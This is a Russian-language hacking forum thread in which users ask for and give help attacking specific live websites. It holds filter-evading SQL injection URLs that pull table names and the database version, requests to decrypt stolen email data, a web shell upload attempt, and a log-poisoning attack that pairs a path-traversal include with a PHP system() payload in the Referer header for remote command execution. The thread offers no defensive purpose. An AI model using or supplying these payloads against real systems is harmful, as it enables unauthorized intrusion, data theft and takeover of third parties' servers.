Старый 29.12.2012, 09:05   #2591
nikp
Banned
 
Регистрация: 05.07.2010
Сообщений: 201
Репутация: 183
По умолчанию

Цитата:
Сообщение от netcat Посмотреть сообщение
Есть SQL, с фильтром на одно слово - select:
Код:
http://www.cb[del]min.org/cbm/staff?staff_id=10+select
Помогите пожалуйста обойти.
http://www.cb[del]min.org/cbm/staff?staff_id=(@:=1)or@ group by concat((sel%00ect table_name from information_schema.tables limit 50,1),@:=!@)having@||min(0)--+
nikp вне форума   Ответить с цитированием
Старый 29.12.2012, 20:09   #2592
spari
 
Регистрация: 10.09.2012
Сообщений: 46
Репутация: 24
По умолчанию

nikp,nice query
but you can use union,since the injection point not gets into this query
Код:
SELECT * FROM tool_staff_pdf WHERE pdf_staff_id = AND pdf_date_posted >= 1325264818 ORDER BY pdf_order DESC LIMIT 1
its gets into this query
Код:
 SELECT * FROM tool_staff WHERE staff_id = 1\' AND staff_active="Active" LIMIT 1
so you can-
Код:
http://www.cbmin.org/cbm/staff?staff_id=1 uni%00on sel%00ect 1,2,3,4,5,6,7,8,9,10,11,version(),13,14,15,16,17,18,19-- -
5.1.66
spari вне форума   Ответить с цитированием
Старый 30.12.2012, 01:44   #2593
opium
 
Аватар для opium
 
Регистрация: 10.09.2010
Сообщений: 37
Репутация: 0
По умолчанию

столкнулся с сайтом на АСП где данные зашифрованы таким вот образом

Data Found: email=++4v1Czd7xV0DpGF8hiwtK9Gd6oTvabF47UVxbLhQ9w=
Data Found: email=++55OAerG+jFB+Dkb6ZjUvHei15FeH4xCBkoHKRkGdxT lH3A5N0oI8XkKvkvx+it
Data Found: email=++5EEh9SRaHLyM9oHbDzvDHBXvRghm9FwJISjHojx9os 3RalFht6SIsUq6oVfHWv

это емайлы. БД - МССкуль

кто-нибудь знает как расшифровать их?
opium вне форума   Ответить с цитированием
Старый 30.12.2012, 02:00   #2594
opium
 
Аватар для opium
 
Регистрация: 10.09.2010
Сообщений: 37
Репутация: 0
По умолчанию

и такие


Data Found: to_address=++0d0pxPv3otzvievcv7o/EPu3iBU2wEMRtY0iMIeXT3tnC2EpdzvbLV+2+2zETbImGmOGE/GSTY3K78jsrDpQ==
Data Found: to_address=++B53rw1cSH7etPiDd3z51cSrHjDUuFSY7xP5oX Jo9GxCMGZGYPfaZkZkIngzk3I
Data Found: to_address=++B53rw1cSH7etPiDd3z51cSrHjDUuFSY7xP5oX Jo9GxCMGZGYPfaZkZkIngzk3I
Data Found: to_address=++B53rw1cSH7etPiDd3z51cSrHjDUuFSY7xP5oX Jo9GxCMGZGYPfaZkZkIngzk3I
Data Found: to_address=++BWEUAq4LmU3YqULcXp0rv6wk+wpzbyTeTw1R1/WRCvGR6EIOPYOjSAb+DmEtUTOjWVm5nWwKAf0aRTDGavIg==
Data Found: to_address=++BWEUAq4LmU3YqULcXp0rv6wk+wpzbyTeTw1R1/WRCvGR6EIOPYOjSAb+DmEtUTOjWVm5nWwKAf0aRTDGavIg==
Data Found: to_address=++BWEUAq4LmU3YqULcXp0rv6wk+wpzbyTeTw1R1/WRCvGR6EIOPYOjSAb+DmEtUTOjWVm5nWwKAf0aRTDGavIg==
opium вне форума   Ответить с цитированием
Старый 30.12.2012, 20:23   #2595
netcat
 
Регистрация: 22.12.2012
Сообщений: 25
Репутация: -1
По умолчанию

http://www.pauladeenmagazine.com/articles.php?id='35'
никак не удается раскрутить, помогите.
netcat вне форума   Ответить с цитированием
Старый 04.01.2013, 21:13   #2596
Untitled
 
Аватар для Untitled
 
Регистрация: 24.06.2012
Сообщений: 131
Репутация: 30
По умолчанию

CMS Comdev One 3.1. Судя по всему, нулленая и старая, живой ссылки на архив с исходниками не нашел. Есть доступ в админку, возможность читать некоторые не-php файлы и SQLi.
Проблема с загрузкой шелла. Файлы заливаются любые, но при прямом обращении к залитому *.php - 404, хотя я уверен, что файл на месте. При обращении к, например, *.php3, *.php.noext123, phtml - 500 Internal Server Error. SSI не работает. Пробовал загружать .htaccess с фишкой "AddHandler x-httpd-php .htaccess" - 500.
Каталог с файлами: /tools/_files/faqsupport/

Потом уже посмотрел имеющиеся .htaccess:
/tools/.htaccess
Код:
#DirectoryIndex index index.php
<Limit GET>
order deny,allow
deny from a.b.c.d
deny from x.y.z.y
allow from all
</Limit>
<Files 403.shtml>
order allow,deny
allow from all
</Files>

deny from a.b.c.d
deny from x.y.z.y
/.htaccess
Код:
#AddHandler application/x-httpd-php5 .php5 .php4 .php .php3 .php2 .phtml
#AddType application/x-httpd-php5 .php5 .php4 .php .php3 .php2 .phtml
#suPHP_ConfigPath /home/hyipe0/public_html/
# -FrontPage-

IndexIgnore .htaccess */.??* *~ *# */HEADER* */README* */_vti*
<IfModule mod_rewrite.c>
Options +FollowSymLinks
</IfModule>
#<Limit GET POST>
#order deny,allow
#deny from all
#allow from all
#</Limit>
<Limit PUT DELETE>
order deny,allow
deny from all
</Limit>
#AuthName xyz.com
#AuthUserFile /home/web/public_html/_vti_pvt/service.pwd
#AuthGroupFile /home/web/public_html/_vti_pvt/service.grp

#<Files php.ini> 
#order allow,deny 
#deny from all 
#</Files> 
#Nanti coba ini sesuai asal
Options +FollowSymLinks
RewriteEngine on
RewriteCond %{HTTP_HOST} ^xyz.com [NC]
RewriteRule ^(.*)$ http://www.xyz.com/$1 [L,R=301]

#<FilesMatch "^([^\.]+)$">
	#ForceType application/x-httpd-php
#</FilesMatch>
<FilesMatch "^([^\.]+)$">
	SetHandler application/x-httpd-php5 
</FilesMatch>

#RewriteEngine on
#RewriteCond %{HTTP_HOST} www.xyz.com [NC]

DirectoryIndex index.php
RewriteRule [.]*-forum-([0-9]*) viewforum.php?%{QUERY_STRING}&f=$1
RewriteRule [.]*-post-([0-9]*) viewtopic.php?%{QUERY_STRING}&p=$1
RewriteRule [.]*-thread-([0-9]*) viewtopic.php?%{QUERY_STRING}&t=$1 



<Limit GET>
order deny,allow
allow from all
</Limit>
<Limit PUT>
order deny,allow
allow from all
</Limit>

<Files 403.shtml>
order allow,deny
allow from all
</Files>

#php_flag zlib.output_compression on
#php_value zlib.output_compression_level 5

ErrorDocument 500 /index.php

#AddType application/x-httpd-php inc
RewriteRule ^rss.xml$ http://info.xyz.com/feed/ [R=301,L]

#php_flag display_errors on 
#php_value error_reporting 7
Идеи?
Untitled вне форума   Ответить с цитированием
Старый 04.01.2013, 22:26   #2597
artrix
 
Регистрация: 13.12.2012
Сообщений: 16
Репутация: -1
По умолчанию

Подскажите, как можно загрузить шелл в данном случае.
Файл с логами нашел.
site.ru/from.pl?list=../../../../../../../../var/www/logs/site.error.log%00
artrix вне форума   Ответить с цитированием
Старый 05.01.2013, 04:28   #2598
beastie
 
Регистрация: 31.12.2012
Сообщений: 4
Репутация: 0
По умолчанию

artrix
В error.log в большинстве случаев пишется "%{Referer}i\", в access.log "%{User-Agent}i\"
PHP код:
GET / HTTP/1.1
Host: site.ru
Referer: <? system($_GET['cmd']) ?>
site.ru/from.pl?list=../../../../../../../../var/www/logs/site.error.log?cmd=id%00
beastie вне форума   Ответить с цитированием
Старый 05.01.2013, 06:27   #2599
NameSpace
 
Регистрация: 21.12.2012
Сообщений: 146
Репутация: 52
По умолчанию

Цитата:
Сообщение от Untitled Посмотреть сообщение
#php_value error_reporting 7[/CODE]Идеи?
Обращайся методом POST.
NameSpace вне форума   Ответить с цитированием
Старый 05.01.2013, 10:23   #2600
artrix
 
Регистрация: 13.12.2012
Сообщений: 16
Репутация: -1
По умолчанию

Цитата:
Сообщение от beastie Посмотреть сообщение
artrix
В error.log в большинстве случаев пишется "%{Referer}i\", в access.log "%{User-Agent}i\"
PHP код:
GET / HTTP/1.1
Host: site.ru
Referer: <? system($_GET['cmd']) ?>
site.ru/from.pl?list=../../../../../../../../var/www/logs/site.error.log?cmd=id%00
Это я знаю. Забыл сказать, Что данный способ не выводит информацию(
А если в данном случае просто вывод информации. Можно забыть о этом сайте?

Последний раз редактировалось artrix; 05.01.2013 в 11:38..
artrix вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2020, Jelsoft Enterprises Ltd. Перевод: zCarot